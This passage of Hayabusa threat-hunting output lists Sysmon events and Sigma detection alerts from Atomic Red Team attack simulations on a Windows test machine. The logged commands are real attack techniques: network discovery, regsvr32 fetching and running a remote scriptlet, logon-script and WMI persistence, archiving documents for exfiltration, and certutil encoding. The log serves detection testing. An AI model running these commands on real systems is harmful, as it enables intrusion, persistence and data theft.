User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5100 | PGUID: 747F3D96-D973-5D31-0000-00108FAD3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.251 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D974-5D31-0000-00107BB03700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.252 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D974-5D31-0000-001068B33700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.253 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D974-5D31-0000-001006BD3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.254 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1624 | PGUID: 747F3D96-D975-5D31-0000-001099C23700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6412 | PGUID: 747F3D96-D976-5D31-0000-00104AC63700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6292 | PGUID: 747F3D96-D976-5D31-0000-0010DBCC3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Network Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: arp -a | Process: C:\Windows\System32\ARP.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | LID: 0x50951 | PID: 1340 | PGUID: 
747F3D96-D976-5D31-0000-001034CF3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D976-5D31-0000-0010D8D53700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4444 | PGUID: 747F3D96-D976-5D31-0000-001041E83700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2332 | PGUID: 747F3D96-D976-5D31-0000-001093EA3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags 
Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 3848 | PGUID: 747F3D96-D977-5D31-0000-00100A0E3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1476 | PGUID: 747F3D96-D977-5D31-0000-0010771B3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D978-5D31-0000-0010442F3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:53:44.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6152 | PGUID: 747F3D96-D978-5D31-0000-00101E7A3800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u 
/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-D97A-5D31-0000-00105DA83800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7148 | PGUID: 747F3D96-D97A-5D31-0000-001089BD3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49728 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3564 | PGUID: 
747F3D96-D97A-5D31-0000-00109DDC3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D97A-5D31-0000-001019DE3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4628 | PGUID: 747F3D96-D97A-5D31-0000-00102BE33800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\regsvr32.exe"" /s 
C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | LID: 0x50951 | PID: 5788 | PGUID: 747F3D96-D97B-5D31-0000-00109DEB3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D97B-5D31-0000-0010F0F03800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4240 | PGUID: 747F3D96-D982-5D31-0000-0010DC633900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | LID: 0x50951 | PID: 3608 | PGUID: 
747F3D96-D983-5D31-0000-00102E663900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Persis,Common Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_common.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Persis | LatMov,Logon Scripts (UserInitMprLogonScript) Registry,,../hayabusa-rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D989-5D31-0000-0010FC7B3900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2000 | PGUID: 
747F3D96-D998-5D31-0000-001008B43900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2424 | PGUID: 747F3D96-D998-5D31-0000-00101BB73900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: 
""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent 
Cmd: powershell | LID: 0x50951 | PID: 4832 | PGUID: 747F3D96-DA3F-5D31-0000-00104C173C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -encode c:\file.exe file.txt | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | LID: 0x50951 | PID: 1260 | PGUID: 747F3D96-DA3F-5D31-0000-00109E193C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4020 | PGUID: 747F3D96-DA3F-5D31-0000-0010562E3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil 
Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -decode file.txt c:\file.exe | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-DA3F-5D31-0000-001022323C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 